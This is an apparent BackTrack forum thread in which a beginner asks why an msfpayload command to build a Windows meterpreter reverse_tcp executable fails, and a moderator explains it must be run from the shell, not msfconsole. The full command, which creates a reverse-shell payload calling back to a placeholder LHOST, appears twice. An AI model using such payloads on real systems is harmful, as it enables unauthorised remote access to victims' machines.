Thread: Building a meterpreter executable (Metasploit)

Hybrid View

Just burned his ISO

Default Building a meterpreter executable (Metasploit)

Has anyone done this, because everytime i do the command
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=IPHERE LPORT=5555 X > met.exe
    it just waits a second then skips a line and makes a new msf >

any help would be greatly appreciated.
    I'm using 3.3.1

Sorry for the double post, but i realized that this would be a better place to post.

Very good friend of the forum Gitsnik's Avatar

You're not trying that from within msfconsole are you? Because that would be the wrong place to do it - msfpayload is a program like msfconsole is, and both should be started from the command line.

I'm just playing a hunch here.

Also I think this would have been better supported in the Newbie area, rather than here.
    Still not underestimating the power...

There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

Quote Originally Posted by stove937 View Post
    Sorry for the double post, but i realized that this would be a better place to post.
    *sigh* Don't do it again please. Moved this to a more appropriate forum.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

Just burned his ISO

ok, really stupid question, how would you start msfpayload from the Command line?

Very good friend of the forum Gitsnik's Avatar

Quote Originally Posted by stove937 View Post
    ok, really stupid question, how would you start msfpayload from the Command line?
    Take a Linux 101 course would be my usual response, but as you already have it written, type this at the bash prompt (just as you would for msfconsole actually):
    Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=IPHERE LPORT=5555 X > met.exe
    This command probably works fine from within msfconsole by the way (it will just create met.exe in the folder you are working from), it's just not good form for someone so obviously learning to run it that way - keep the command line stuff in the command line and all that.

I suggest you familiarise yourself with a normal linux distribution - something like Ubuntu - and it's command line operations before you continue cracking boxes - you can get by pointing and clicking, but it makes you nothing more than a skiddie or a vulnerability assessor (depending on your job and legality).
    Still not underestimating the power...

There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

Just burned his ISO

Thanks for your help!

Quote Originally Posted by Gitsnik View Post
    you can get by pointing and clicking, but it makes you nothing more than a skiddie or a vulnerability assessor (depending on your job and legality).
    I lol'd hard
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.